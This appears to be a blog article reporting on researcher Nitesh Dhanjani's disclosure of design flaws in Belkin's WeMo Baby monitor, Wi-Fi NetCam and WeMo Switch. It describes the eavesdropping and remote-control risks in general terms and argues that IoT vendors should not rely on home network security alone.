Eavesdropping made easy: Remote spying with WeMo Baby and an iPhone

When it comes to home automation, many people turn to Belkin WeMo because you can plug almost anything into the “smart” electrical switch and then remotely control it from a smartphone. As more people dive into the Internet of Things (IoT), “easy” and hackable home automation with connected devices controlled by mobile phones, security researcher Nitesh Dhanjani presents, “Reconsidering the Perimeter Security Argument” [pdf]. He highlights flaws in Belkin’s WeMo Switch, Wi-Fi NetCam and WeMo Baby. He demonstrates a “glaring design issue” in WeMo Baby that allows “anyone with one-time access to the local Wi-Fi where the monitor is installed” to later “listen in without authentication” and to “continue to listen in remotely.”

The Organization for Economic Co-operation and Development estimates, “By 2022, the average household with two teenage children will own roughly 50 Internet-connected devices, up from approximately 10 today.” Although estimates vary, the International Data Corporation expects “the installed base of the Internet of Things will be approximately 212 billion ‘things’ globally by the end of 2020. This will include 30.1 billion installed ‘connected (autonomous) things’ in 2020.”

Yet despite the positive aspects that home automation can bring us, Dhanjani states:

IoT device manufacturers should lay the foundation for a strong security architecture that is usable as well as not easily susceptible to other devices on the network. In these times, a compromised device on a home network can lead to the loss of financial information and personal information. If IoT device vendors continue their approach of depending on the local home network and all other device being completely secure, we will live in a world where a compromised device can result in gross remote violation of privacy and physical security of its customers.

WeMo Baby

Regarding the Belkin WeMo Baby, Dhanjani quoted an Amazon review by Lon Seidman:

…But that’s not the only issue plaguing this device. The other is a very poor security model that leaves the WeMo open to unwelcome monitoring. The WeMo allows any iOS device on your network to connect to it and listen in without a password. If that’s not bad enough, when an iPhone has connected once on the local network it can later tune into the monitor from anywhere in the world.

Dhanjani then demonstrated that flaw in a video. His proof-of-concept attack “turns a wireless baby monitor made by Belkin into a stealthy bugging device that can be accessed by someone in your front yard…or halfway around the world,” reported Ars Technica.

While it’s not the baby monitor cam hack that allowed a creep to spy on a toddler in her crib, Dhanjani also pointed out [pdf] that the Belkin Wi-Fi NetCam “lets users remotely view video from the camera.” The “NetCam password can be captured by local Wi-Fi users and by the internet service provider to obtain full blown remote access to the camera,” he wrote. “Once the attacker or botnet herder has collected the credentials,” then “he or she can spy on the victim using the Netcam app.”

WeMo Switch

Before presenting “Weaponizing your coffee pot” at DerbyCon, Daniel Buentello plugged a lamp into a Wemo Switch and made the relay click off and on so fast that it appeared as if the lamp might explode. Dhanjani also took issue with the WeMo Switch in his paper [pdf], “Similar to the situation in WeMo Baby, malware on the local network can easily turn devices on the WeMo Switch on or off by directly invoking a POST request.”

After pointing users toward Issac Kelly’s GitHub code for an example, Dhanjani wrote, “Also similar to WeMo Baby, the malware script can obtain remote access and ship the authorized token to an attacker remotely. In this scenario a potential botnet herder can easily gain remote access to multiple WeMo switches in homes where his or her malware has been deployed.”

Dhanjani concluded, “As seen by the detailed illustrations in the above examples, we cannot secure our future by asserting that IoT devices and supporting applications have no responsibility to protecting the user’s privacy and security beyond requiring the user to setup a strong Wi-Fi password.”

Like this? Here’s more posts:

• How Microsoft invented, or invisibly runs, almost everything
• Misery by Microsoft: IE11 mangled Google, Windows RT 8.1 bricked some devices
• Wireless feature disabled on pacemaker to stop hackers from assassinating Cheney
• Report: NSA tracks and maps American citizens’ social connections
• FBStalker and GeoStalker data mining tools can dig into your life
• Extreme tech for covert audio surveillance
• Have you protected your privacy by opting out of cross-device ad tracking?
• Most parents allow unsupervised internet access to children at age 8
• Not even Microsofties trust Microsoft’s approach to privacy
• Wham bam thanks for giving up your Facebook and Google privacy, ma’am
• Chris Hemsworth goes to ‘nerd school’ for hacking in cyber-terrorism thriller ‘Cyber’
• Are Bing it on challenge claims a bunch of bunk?

Follow me on Twitter @PrivacyFanatic